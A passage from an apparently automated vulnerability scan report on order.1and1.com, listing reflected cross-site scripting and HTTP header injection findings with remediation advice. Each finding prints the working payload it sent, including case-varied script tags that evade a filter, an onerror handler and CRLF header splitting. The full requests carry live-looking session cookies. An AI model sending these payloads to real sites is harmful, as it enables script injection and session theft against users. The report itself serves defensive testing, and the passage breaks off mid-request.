This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Service2eb97</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>359b8a2e72d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/Service;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:38:12 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=ObmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS4xLC8wKSo=; Expires=Fri, 07-Apr-2079 21:52:19 GMT; Path=/
ETag: c4342f28d37068506013b97debbec70f
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18491


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
9CC9FB631C4D3D45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Service";UNOUNO.params.lastpage="Service2eb97</ScRiPt ><x style=x:expression(alert(1))>359b8a2e72d";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.24. http://order.1and1.com/xml/order/Sharepoint [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Sharepoint

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Sharepoint is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Sharepoint. The payload 2f20e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>1ed21c34ec was submitted in the REST URL parameter 3. This input was returned as 2f20e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>1ed21c34ec in a subsequent request for the URL /xml/order/Sharepoint.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Sharepoint2f20e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>1ed21c34ec;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.sharepoint HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.sharepoint HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:35:11 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=EYVY9QEE3YGBgWm1jajBoYi8hK2RXUSlAM0QsMC0tLCosKicnKikjJiodHx4dGj8tcGVndS0vKlozXWwyJSYiISYiICMhGyMxMDlxcjgtNGRtMyYnIyInJCEkHyIjHDQ=; Expires=Fri, 07-Apr-2079 21:49:18 GMT; Path=/
ETag: e83c3ad0fe1642c7f919fde422e24b61
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 25676


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
631C4D3D45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Sharepoint";UNOUNO.params.lastpage="Sharepoint2f20e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>1ed21c34ec";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.25. http://order.1and1.com/xml/order/VirtualServerL [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerL

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/VirtualServerL is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/VirtualServerL. The payload dddff</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>d0fee8f5448 was submitted in the REST URL parameter 3. This input was returned as dddff</ScRiPt ><img src=a onerror=alert(1)>d0fee8f5448 in a subsequent request for the URL /xml/order/VirtualServerL.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/VirtualServerLdddff</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>d0fee8f5448;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=CloudDynamicServer; ucuo=20110320185042-000.TCpfix141a; lastpage=VirtualServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=hdWo6PT40XV1dV2pgZy1lXyweKGFUTj1UR0EpLSoqKScpJyQkJyYgIycaHBsaLlNBbWJkciosJ1cwWmkvIiMfHiMfHSA1LzcuLTZubzUqMWFqMCMkIB8kIR8fHjMxMzY=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:31:AAABLtRnmq4LJJFFFit1Kk3sM2vCTUk2:1300643682990; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Request 2

GET /xml/order/VirtualServerL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=CloudDynamicServer; ucuo=20110320185042-000.TCpfix141a; lastpage=VirtualServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=hdWo6PT40XV1dV2pgZy1lXyweKGFUTj1UR0EpLSoqKScpJyQkJyYgIycaHBsaLlNBbWJkciosJ1cwWmkvIiMfHiMfHSA1LzcuLTZubzUqMWFqMCMkIB8kIR8fHjMxMzY=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:31:AAABLtRnmq4LJJFFFit1Kk3sM2vCTUk2:1300643682990; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:55:14 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=1bmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS8vLiwqLC8=; Expires=Fri, 07-Apr-2079 21:09:21 GMT; Path=/
ETag: 4e920a97deb964d5714c04e7a127f5e2
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 49849


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
891BE.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="VirtualServerL";UNOUNO.params.lastpage="VirtualServerLdddff</ScRiPt ><img src=a onerror=alert(1)>d0fee8f5448";UNOUNO.params.articles="1|tariff-vps-l"};
   //-->
...[SNIP]...

1.26. http://order.1and1.com/xml/order/popupDomainPrices [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/popupDomainPrices

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/popupDomainPrices is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/popupDomainPrices. The payload 753b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>63529f6639f was submitted in the REST URL parameter 3. This input was returned as 753b5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>63529f6639f in a subsequent request for the URL /xml/order/popupDomainPrices.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/popupDomainPrices753b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>63529f6639f;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/popupDomainPrices;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:48:45 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=VZ1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 22:02:52 GMT; Path=/
ETag: f4b8ec0d36405e52072e7ef2a900c637
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20365


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="popupDomainPrices";UNOUNO.params.lastpage="popupDomainPrices753b5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>63529f6639f";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

2. HTTP header injection
There are 12 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://order.1and1.com/xml/order/Jumpto [jsessionid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the jsessionid request parameter is copied into the Location response header. The payload ed455%0d%0a503217b4f8d was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_toped455%0d%0a503217b4f8d&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:57 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=PU.WH.US&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.WH.US&linkOrigin=Hosting&linkId=hd.log.eue&__frame=_toped455
503217b4f8d

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=5al8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSotKCssJSY=; Expires=Fri, 07-Apr-2079 21:37:04 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


2.2. http://order.1and1.com/xml/order/Jumpto [linkId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the linkId request parameter is copied into the Location response header. The payload c29e1%0d%0a97b1abda1ab was submitted in the linkId parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=c29e1%0d%0a97b1abda1ab&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:57 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=PU.WH.US&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.WH.US&linkOrigin=Hosting&linkId=c29e1
97b1abda1ab
&__frame=_top
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 21:37:04 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


2.3. http://order.1and1.com/xml/order/Jumpto [linkOrigin parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the linkOrigin request parameter is copied into the Location response header. The payload a5802%0d%0a86591ee57c3 was submitted in the linkOrigin parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=a5802%0d%0a86591ee57c3&linkId=hd.log.eue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
